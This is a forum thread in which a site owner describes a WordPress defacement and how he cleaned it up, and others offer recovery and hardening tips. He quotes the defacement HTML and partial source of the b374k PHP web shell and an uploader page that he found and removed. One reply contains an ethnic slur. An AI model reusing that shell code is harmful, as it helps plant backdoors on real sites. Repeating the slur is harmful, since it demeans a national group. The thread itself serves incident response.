1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Wordpress site hacked by Bangladeshi Hacker!

Discussion in 'Black Hat SEO' started by ePrime, Oct 20, 2015.

  1. ePrime

    ePrime Jr. VIP Jr. VIP

    Joined:
    Aug 16, 2014
    Messages:
    293
    Likes Received:
    107
    My wordpress site (Version 4.3.1 running Dynamic News Lite) was hacked today by some Bangladeshi hacker named Sid Gifari.
    Here is the message I get when I tried to access my site: hack2.jpg
    However, WP Admin Panel is working just fine. I looked into WP files and found that they have replaced everything in index.php with this:
    Code:
    <html><title>[::] Hacked By Sid Gifari [::]</title><h1><strong><em>[!!] Hacked By Sid Gifari [!!]</em></strong></h1><strong>From Bangladesh Level Seven Hacker Team</strong>[::] We Are Muslim Hacker [::]
    I can easily replace the files with original ones but that would be a temporary solution; if they could get into my file once, the can do it again. Does any one have any idea about this hack?

    Thanks.
     
  2. Djuan

    Djuan Registered Member

    Joined:
    Aug 21, 2012
    Messages:
    76
    Likes Received:
    13
    Gender:
    Male
    Location:
    Sweden
    Did you use any "nulled" Theme/plugin?
     
  3. soccerlover

    soccerlover Jr. VIP Jr. VIP

    Joined:
    Jun 12, 2014
    Messages:
    3,347
    Likes Received:
    1,738
    Gender:
    Male
    Occupation:
    Seo Analyst :D
    Location:
    ♥♥♥ BHW ♥♥♥
    Home Page:
    Try to check the access log ones, you'll find the IP address who made the updates.
    In the end, block them from cPanel > IP Blacklist or the series from .htaccess.
    You can block the entire country too :) If you don't want your site to be visualize in any particular region.
     
  4. Conor

    Conor Elite Member

    Joined:
    Nov 7, 2012
    Messages:
    3,577
    Likes Received:
    5,954
    Gender:
    Male
    Location:
    South Africa
    Home Page:
    Two plugins I recommend:

    For Scanning/Removing Malware: Anti-Malware and Brute-Force Security by ELI
    For Hardening Security: iThemes Security
     
  5. Boriss

    Boriss Supreme Member

    Joined:
    Nov 7, 2009
    Messages:
    1,440
    Likes Received:
    569
    Location:
    Inside a Monitor
    It's just a simple and ugly deface.

    To fix it:


    1. Download a fresh copy of Wordpress from the official site.
    2. First go to your WordPress with FTP or cPanel.
    3. Delete the "index.php"
    4. Then copy the "index.php" file downloaded from WordPress to your site.

    And your done.

    Edit: Scan your sites across your server and see whats wrong.
    Always update your plugins and themes, and never use nulled scripts/themes/plugins.
     
    • Thanks Thanks x 1
    Last edited: Oct 20, 2015
  6. xpresstechnologies

    xpresstechnologies Regular Member

    Joined:
    Dec 14, 2012
    Messages:
    337
    Likes Received:
    59
    Occupation:
    Businessman
  7. ePrime

    ePrime Jr. VIP Jr. VIP

    Joined:
    Aug 16, 2014
    Messages:
    293
    Likes Received:
    107
    BTW, I successfully removed his scripts from my account.
    What I Did:
    1. Opened my FlieZilla and logged in to my account.
    2. Clicked on "Last Modified" to list all the directories that were modified today.
    3. Then entered all the directories that were modified today one by one and then again listed the files based on last modified.
    4. All the index.php files were modified. This was NOT only a WP hack, index.php files of all other CMSes were modified.
    5. During my search, I found two suspicious files: b.php and up.php
    These files were used to upload malicious index.php but I'm still unsure how they uploaded these files in the first place?
    6. Removed b.php and up.php and replaced index.php with original file and I'm safe for a few more days!!

    b.php contents (Incomplete)
    Code:
    <?php/*
        b374k 2.8
        Jayalah Indonesiaku
        (c)2013
        http://code.google.com/p/b374k-shell
    
    
    */
    $s_pass = "fb621f5060b9f65acf8eb4232e3024140dea2b34"; // default password : b374k (login and change to new password)
    
    
    $s_ver = "2.8"; // shell ver
    $s_title = "b374k ".$s_ver; // shell title
    $s_login_time = 3600 * 24 * 7; // cookie time (login)
    $s_debug = false; // debugging mode
    
    
    @ob_start();
    @set_time_limit(0);
    @ini_set('html_errors','0');
    @clearstatcache();
    define('DS', DIRECTORY_SEPARATOR);
    
    
    // clean magic quotes
    $_POST = clean($_POST);
    $_GET = clean($_GET);
    $_COOKIE = clean($_COOKIE);
    $_GP = array_merge($_POST, $_GET);
    $_GP = array_map("ru", $_GP);
    
    
    
    
    if($s_debug){
        error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
        @ini_set('display_errors','1');
        @ini_set('log_errors','1');
        foreach($_GP as $k=>$v){
            if(is_array($v)) $v = print_r($v, true);
            echo "<span>".hss($k."=>".$v)."</span><br />";
        }
    
    }
    up.php contents (incomplete)
    Code:
    <html>
    <title>.::Sid Gifari's Uploader ::.</title>
    <style type="text/css">
    table {border-collapse: collapse;}
    td, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}
    </style>
    <body>
    <center>
    <font color= #e61e1e>
    <h1><strong><em>Sid Gifari's privet shell uploader</em></strong></h1>
    <br>----------------------------------------------------------------</font>
    <br>
    <br>
    <br>
    <form method="post"  enctype="multipart/form-data">
    <table width="350" border="0" cellpadding="1" cellspacing="1" class="box">
    <tr>
    
    Anyone has any idea how they uploaded b.php and up.php in the first place.
    Thanks.
     
    Last edited: Oct 20, 2015
  8. zlogz

    zlogz Regular Member

    Joined:
    Jan 22, 2011
    Messages:
    403
    Likes Received:
    43
    Location:
    -
    are you using shared hosting ? then you should check about local attack (1) => remote upload

    Or
    using nulled plugins/themes is an easy hack too (2)

    Or 0-day exploit there nothing you cant do about it until they ( developer ) fix it (3)
     
    Last edited: Oct 20, 2015
  9. ePrime

    ePrime Jr. VIP Jr. VIP

    Joined:
    Aug 16, 2014
    Messages:
    293
    Likes Received:
    107
    No, I'm not using nulled scripts.
    Thanks, I'll checkout local attack (1) => remote upload
     
  10. Ambitious12

    Ambitious12 Elite Member

    Joined:
    Jun 26, 2014
    Messages:
    3,096
    Likes Received:
    609
    Occupation:
    No Occupation
    Location:
    Among the Stars
    You can ask your hosting provider for security.
     
  11. Asif WILSON Khan

    Asif WILSON Khan Executive VIP Jr. VIP

    Joined:
    Nov 10, 2012
    Messages:
    12,156
    Likes Received:
    33,709
    Gender:
    Male
    Occupation:
    Fun Lovin' Criminal
    Location:
    London
    Home Page:
  12. auraita

    auraita Regular Member

    Joined:
    Dec 30, 2013
    Messages:
    283
    Likes Received:
    280
    he is not a hacker, he only does copy, paste, release and search.the sites that "hacked" by him are wordpress. probably he has no idea how to hack a site without ready codes.
     
    • Thanks Thanks x 1
  13. kunnu

    kunnu Regular Member

    Joined:
    Jun 28, 2015
    Messages:
    217
    Likes Received:
    34
    Home Page:
    Maybe your PC is infected and you are using a normal FTP. You should always use sFTP (Secure FTP).

    Most of WP site hacked because of they use old or outdated plugin/themes or use themes from anywhere.

    Change everything, FTP Password, Email password, control panel, mysql password and remove all files/folder from your site and reinstall wordpress and use old mysql.
     
  14. ki jancuk

    ki jancuk Newbie

    Joined:
    Oct 11, 2015
    Messages:
    1
    Likes Received:
    0
    There is words "Indonesia" there.

    Indonesian hacker is most motherfuck*er hacker in the world
     
  15. RuthSam

    RuthSam Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 19, 2010
    Messages:
    3,813
    Likes Received:
    976
    Gender:
    Male
    Home Page:
    The scanners listed in this thread are good, I use one or 2 of them regularly on my sites. Thanks for sharing your info to recover the WP installation.
     
  16. fpiket18

    fpiket18 Newbie

    Joined:
    Feb 27, 2015
    Messages:
    14
    Likes Received:
    0
    Damn hacker! Why does he even do this?
     
  17. ScarfaceMontana

    ScarfaceMontana Registered Member

    Joined:
    Mar 2, 2015
    Messages:
    84
    Likes Received:
    26
    These two php files are shells. They got somehow access to your WP Panel and uploaded them as a image file or so but then renamed it. Anyways, the best thing you can do is to install a new WP installation and then use your backups to restore everything.
     
  18. ScarfaceMontana

    ScarfaceMontana Registered Member

    Joined:
    Mar 2, 2015
    Messages:
    84
    Likes Received:
    26
    Several reasons. Probably to test his skills. Or he was going to put damage to this dudes business because, probably he is a competitor.
     
  19. Berkeli

    Berkeli Regular Member

    Joined:
    Oct 16, 2012
    Messages:
    352
    Likes Received:
    216
    Occupation:
    SEO
    Location:
    Above & Beyond
    Home Page:
    I can only assume you have your PC infected..
    It isn't easy to upload php files to a wordpress, only through ftp or admin panel.. Just change your passwords and use sFTP ass mentioned above
     
  20. Conor

    Conor Elite Member

    Joined:
    Nov 7, 2012
    Messages:
    3,577
    Likes Received:
    5,954
    Gender:
    Male
    Location:
    South Africa
    Home Page:
    I doubt that. A competitor wouldn't just deface a website if they really wanted to get rid of their competition. This is more likely a kid who found some "hacking" codes on the internet and is trying to impress his friends.